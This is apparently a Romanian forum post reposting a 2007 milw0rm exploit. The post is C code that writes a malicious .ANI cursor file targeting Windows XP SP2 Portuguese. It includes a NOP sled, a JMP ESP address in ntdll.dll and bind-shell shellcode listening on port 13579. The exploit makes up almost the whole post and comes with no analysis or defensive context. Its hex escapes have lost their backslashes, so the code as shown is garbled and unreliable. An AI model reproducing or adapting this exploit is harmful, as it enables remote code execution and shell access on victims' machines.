epic
User
 Inregistrat: acum 17 ani
Postari: 1896
|
|
Code:
/*
.ANI exploit tested on Windows XP SP2 - Portuguese
Shellcode port bind 13579
JMP ESP Addr - ntdll.dll
Greetz: Marsu, Devcode, Str0ke, Dave, Sekure.org guys, Sauna.
Exploit coded listen sauna hits
Featuring Luiz Zanardo's gigs "Minoide -�x52x49x46x46x00x04x00x41" @ www.myspace.com/fuzzyproject
Breno Silva Pinto
bsilva[at]Sekure.org
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
unsigned char aniheader[] =
"x52x49x46x46x00x04x00x00x41x43x4Fx4Ex61x6Ex69x68"
"x24x00x00x00x24x00x00x00xFFxFFx00x00x0Ax00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x10x00x00x00x01x00x00x00x54x53x49x4Cx03x00x00x00"
"x10x00x00x00x54x53x49x4Cx03x00x00x00x02x02x02x02"
"x61x6Ex69x68xA8x03x00x00";
unsigned char Shellcode[] =
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x29xc9x83xe9xafxd9xeexd9x74x24xf4x5bx81x73x13x8f"
"x35x37x85x83xebxfcxe2xf4x73x5fxdcxcax67xccxc8x7a"
"x70x55xbcxe9xabx11xbcxc0xb3xbex4bx80xf7x34xd8x0e"
"xc0x2dxbcxdaxafx34xdcx66xbfx7cxbcxb1x04x34xd9xb4"
"x4fxacx9bx01x4fx41x30x44x45x38x36x47x64xc1x0cxd1"
"xabx1dx42x66x04x6ax13x84x64x53xbcx89xc4xbex68x99"
"x8exdex34xa9x04xbcx5bxa1x93x54xf4xb4x4fx51xbcxc5"
"xbfxbex77x89x04x45x2bx28x04x75x3fxdbxe7xbbx79x8b"
"x63x65xc8x53xbexeex51xd6xe9x5dx04xb7xe7x42x44xb7"
"xd0x61xc8x55xe7xfexdax79xb4x65xc8x53xd0xbcxd2xe3"
"x0exd8x3fx87xdax5fx35x7ax5fx5dxeex8cx7ax98x60x7a"
"x59x66x64xd6xdcx66x74xd6xccx66xc8x55xe9x5dx02x8e"
"xe9x66xbex64x1ax5dx93x9fxffxf2x60x7ax59x5fx27xd4"
"xdaxcaxe7xedx2bx98x19x6cxd8xcaxe1xd6xdaxcaxe7xed"
"x6ax7cxb1xccxd8xcaxe1xd5xdbx61x62x7ax5fxa6x5fx62"
"xf6xf3x4exd2x70xe3x62x7ax5fx53x5dxe1xe9x5dx54xe8"
"x06xd0x5dxd5xd6x1cxfbx0cx68x5fx73x0cx6dx04xf7x76"
"x25xcbx75xa8x71x77x1bx16x02x4fx0fx2ex24x9ex5fxf7"
"x71x86x21x7axfax71xc8x53xd4x62x65xd4xdex64x5dx84"
"xdex64x62xd4x70xe5x5fx28x56x30xf9xd6x70xe3x5dx7a"
"x70x02xc8x55x04x62xcbx06x4bx51xc8x53xddxcaxe7xed"
"xf1xedxd5xf6xdcxcaxe1x7ax5fx35x37x85";
int main( int argc, char **argv ) {
char Buffer[1024];
FILE *f;
if ( argc < 2 ) {
printf("usage %s <file.ani>n",argv[0]);
return 0;
}
memset( Buffer, 0x90, sizeof( Buffer ) );
memcpy( Buffer, aniheader, sizeof( aniheader ) - 1 );
memcpy( Buffer + 168, "xedx1ex94x7c", 4 ); // JMP ESP - NTDLL. Hey Dave ... this is for you brotha!
memcpy( Buffer + 198, Shellcode, sizeof( Shellcode ) - 1 );
f = fopen( argv[1], "wb" );
if ( f == NULL ) {
printf("Cannot create filen");
return 0;
}
fwrite(Buffer, 1, 1024, f);
fclose(f);
printf(".ANI file created!n");
return 0;
}
// milw0rm.com [2007-04-09] |
milw0rm.com
_______________________________________
:< 4 8 15 16 23 42 *execute*
TOATA LUMEA ESTE INVITATA PE NOUL FORUM!
|
|
| pus acum 17 ani |
|
